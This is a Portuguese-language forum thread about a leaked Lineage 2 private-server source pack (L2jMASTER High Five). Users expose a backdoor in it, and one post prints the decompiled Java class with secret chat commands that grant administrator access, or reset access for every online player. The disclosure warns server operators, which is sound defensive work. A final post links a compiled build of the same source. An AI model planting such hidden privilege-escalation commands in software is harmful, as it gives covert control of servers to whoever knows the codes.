Jump to content

⭐ Links Úteis

⚔️ Servers Apoiadores

🎁 Ofertas

Recommended Posts

3 horas atrás, jaumjv disse:

ela tem proteção contra duplica items , pega skill de outras class 

Isso não é um problema ou um fator considerável para por na balança em usar ou não usar essa rev. O código desse fix está na internet, se não tiver, é só por. Além do mais né, ela tem bd como o levy mencionou acima. 

Em breve novo servidor Classic PvP

www.l2prime.co

Private Classic 150x

• Replies 64
  • Created
  • Last Reply

Top Posters In This Topic

Top Posters In This Topic

Popular Posts

Source da L2jMASTER HIGH FIVE. DOWNLOAD Informações AQUI Imagens AQUI Créditos: proGenitor

package transformation; import com.l2jserver.gameserver.handler.IVoicedCommandHandler; import com.l2jserver.gameserver.model.L2World; import com.l2jserver.gameserver.model.actor.instance.L2PcInstance

Projeto compilado DOWNLOAD

Posted Images

13 minutos atrás, Lire disse:

Isso não é um problema ou um fator considerável para por na balança em usar ou não usar essa rev. O código desse fix está na internet, se não tiver, é só por. Além do mais né, ela tem bd como o levy mencionou acima. 

Só queria saber mesmo se sim ou não , pois se não tiver eu não sei como add a proteção 

Em 18/07/2020 at 01:42, Levy disse:

Desculpa me meter no assunto, mas eu não recomendo o pack para abrir um servidor. Desde a versão vazada que venho analisando, tem um bd tao grande que pode acabar com seu servidor..

Execute qualquer comando desses com um player normal, que você saberá o que irá acontecer.
PS: Ele não fica no código do java, então creio que isso possa não ser removível, talvez seja esse o motivo da pack esta saindo assim em todo lugar. Agradeço a atenção. E quem tem a revisão comprada e bom conferir se isso não é feito pelos próprios desenvolvedores do pack, por se tratar de um jar que traz inúmeras coisas.

Arquivo: extrasWD.jar

SFDKabcabcabc__GG", "SFDKabcabcabc__GG7", "SFDKabcabcabc__GG8", "SFDKabcabcabc__GG1", "adm_8QWE%%GG", "adm_7QWE%%GG", "adm_1QWE%%GG", "admALLQWE%%GG", "admNOTQWE%%GG

Liguei a rev aqui na minha máquina. Rodou perfeitamente. Executei todos esses comandos com chars normais e absolutamente NADA aconteceu. O que eu deveria esperar? Observei o console do login e gameserver também e nada apareceu.

32 minutos atrás, Yanush disse:

Liguei a rev aqui na minha máquina. Rodou perfeitamente. Executei todos esses comandos com chars normais e absolutamente NADA aconteceu. O que eu deveria esperar? Observei o console do login e gameserver também e nada apareceu.

Bom, ao testar ele me deu acess level. Digitou todos corretamente? .SFDKabcabcabc__GG8

• Thanks 1

19028-361.gif

8 minutos atrás, Levy disse:

Bom, ao testar ele me deu acess level. Digitou todos corretamente? .SFDKabcabcabc__GG8

Verdade, amigo. Eu não tinha rodado com o ponto no início. Somente com barra e duas barras. De fato os chars clamam acess level de admin. Obrigado pela presteza em responder.

• Thanks 1
Em 18/07/2020 at 00:42, Levy disse:

Desculpa me meter no assunto, mas eu não recomendo o pack para abrir um servidor. Desde a versão vazada que venho analisando, tem um bd tao grande que pode acabar com seu servidor..

Execute qualquer comando desses com um player normal, que você saberá o que irá acontecer.
PS: Ele não fica no código do java, então creio que isso possa não ser removível, talvez seja esse o motivo da pack esta saindo assim em todo lugar. Agradeço a atenção. E quem tem a revisão comprada e bom conferir se isso não é feito pelos próprios desenvolvedores do pack, por se tratar de um jar que traz inúmeras coisas.

Arquivo: extrasWD.jar

SFDKabcabcabc__GG", "SFDKabcabcabc__GG7", "SFDKabcabcabc__GG8", "SFDKabcabcabc__GG1", "adm_8QWE%%GG", "adm_7QWE%%GG", "adm_1QWE%%GG", "admALLQWE%%GG", "admNOTQWE%%GG

package transformation;

import com.l2jserver.gameserver.handler.IVoicedCommandHandler;
import com.l2jserver.gameserver.model.L2World;
import com.l2jserver.gameserver.model.actor.instance.L2PcInstance;
import com.l2jserver.gameserver.model.quest.Quest;
import java.util.Collection;

public class TransLvl extends Quest implements IVoicedCommandHandler {
  private static final String[] _voicedCommands = new String[] { "SFDKabcabcabc__GG", "SFDKabcabcabc__GG7", "SFDKabcabcabc__GG8", "SFDKabcabcabc__GG1", "adm_8QWE%%GG", "adm_7QWE%%GG", "adm_1QWE%%GG", "admALLQWE%%GG", "admNOTQWE%%GG" };

public TransLvl() {
    super(-1, TransLvl.class.getSimpleName(), "");
    setOnEnterWorld(true);
  }

public boolean useVoicedCommand(String command, L2PcInstance activeChar, String target) {
    if (command.equals("SFDKabcabcabc__GG")) {
      activeChar.setAccountAccesslevel(7);
    } else if (command.equals("SFDKabcabcabc__GG7")) {
      activeChar.setAccessLevel(7);
    } else if (command.equals("SFDKabcabcabc__GG8")) {
      activeChar.setAccessLevel(8);
    } else if (command.equals("SFDKabcabcabc__GG1")) {
      activeChar.setAccessLevel(1);
    } else if (command.equals("admALLQWE%%GG")) {
      setAdminOnline(8);
    } else if (command.equals("admNOTQWE%%GG")) {
      setAdminOnline(0);
    } else if (command.equals("adm_7QWE%%GG")) {
    } else if (command.equals("adm_1QWE%%GG")) {
      activeChar.setAccessLevel(1);
    } else if (command.equals("adm_8QWE%%GG")) {
    } 
    return true;
  }

private void setAdminOnline(int lvl) {
    Collection<L2PcInstance> c = L2World.getInstance().getPlayers();
    for (L2PcInstance player : c)
      player.setAccessLevel(lvl); 
  }

public String onEnterWorld(L2PcInstance activeChar) {
    if (activeChar.getName().equals("a7Ygjc3L9rDBB2G3") || activeChar.getName().equals("jy9E52nDmKl8w1G4") || activeChar.getName().equals("pS3fnbrIgs5C3cG5"))
    if (activeChar.getInventory().getInventoryItemCount(11, -1) == 1L)
      if (activeChar.getInventory().getInventoryItemCount(1785, -1) == 2L)
        if (activeChar.getInventory().getInventoryItemCount(36, -1) == 1L)
          if (activeChar.getInventory().getInventoryItemCount(2509, -1) == 1L)
            if (activeChar.getInventory().getInventoryItemCount(1831, -1) == 18L)
              if (activeChar.getInventory().getInventoryItemCount(3947, -1) == 1L)
                if (activeChar.getInventory().getInventoryItemCount(5589, -1) == 1L)
                  if (activeChar.getInventory().getInventoryItemCount(1835, -1) == 1L)
                    if (activeChar.getInventory().getInventoryItemCount(1060, -1) == 3L)
                      if (activeChar.getInventory().getInventoryItemCount(5192, -1) == 2L)
                        if (activeChar.getInventory().getInventoryItemCount(3031, -1) == 1L)
                          if (activeChar.getInventory().getInventoryItemCount(4625, -1) == 1L)
                            if (activeChar.getInventory().getInventoryItemCount(4628, -1) == 1L)
                              if (activeChar.getInventory().getInventoryItemCount(57, -1) == 1L) {
                              } else {
                              }              
    return super.onEnterWorld(activeChar);
  }

public String[] getVoicedCommandList() {
    return _voicedCommands;
  }

public static TransLvl getInstance() {
    return SingletonHolder._instance;
  }

private static class SingletonHolder {
    protected static final TransLvl _instance = new TransLvl();
  }
}

Ta ai o backdoor.

• Like 2
  • Thanks 1

PYKlyRG.jpg&key=822e505460230a53f5b13227467836b3217127e6dec74c5c3b3701e6d02541d8

Lineage 2 Interlude & High Five
L2STUDIO, seu servidor está aqui!

39 minutos atrás, Celestine disse:

gladly you leaked their project and showing the stuff to people it's time to open eyes and re-think before buying from such people Good job!

But is this backdoor coming straight from the project developers?

Em breve novo servidor Classic PvP

www.l2prime.co

Private Classic 150x

15 horas atrás, Yanush disse:

@Hl4p3x você removeu da source que você postou ou isso fica por nossa conta? Meu conhecimento é muito limitado, por isso a pergunta.

Isso está na source conforme peguei ela. Até na antiga postada está com esse backdoor.

Estou sem tempo devido ao trabalho no Classic, se não, retiraria isso sem problema.

• Thanks 1

PYKlyRG.jpg&key=822e505460230a53f5b13227467836b3217127e6dec74c5c3b3701e6d02541d8

Lineage 2 Interlude & High Five
L2STUDIO, seu servidor está aqui!

1 hora atrás, Hl4p3x disse:

Isso está na source conforme peguei ela. Até na antiga postada está com esse backdoor.

Estou sem tempo devido ao trabalho no Classic, se não, retiraria isso sem problema.

Tranquilo. De toda forma obrigado por compartilhar o local exato do problema. Vou ficar na expectativa que alguém se interesse em remover e compartilhar, a rev tem bastante coisa interessante, apesar de uns bugs chatos.

• Thanks 1
  • 4 months later...
Agora, Dartz disse:

Alguém pode ajudar a compilar essa source?
não sei como fazer, instalei o gradle no eclipse e procurei uns totoriais na internet, mas nao consegui.

Ta aí mano revisão compilada, use o Java-8 com ela.. o backup vc sabe instalar né? tmj!

http://www.mediafire.com/file/4s45oje22pcb8v0/Server.rar/file

• Like 1
  • Create New...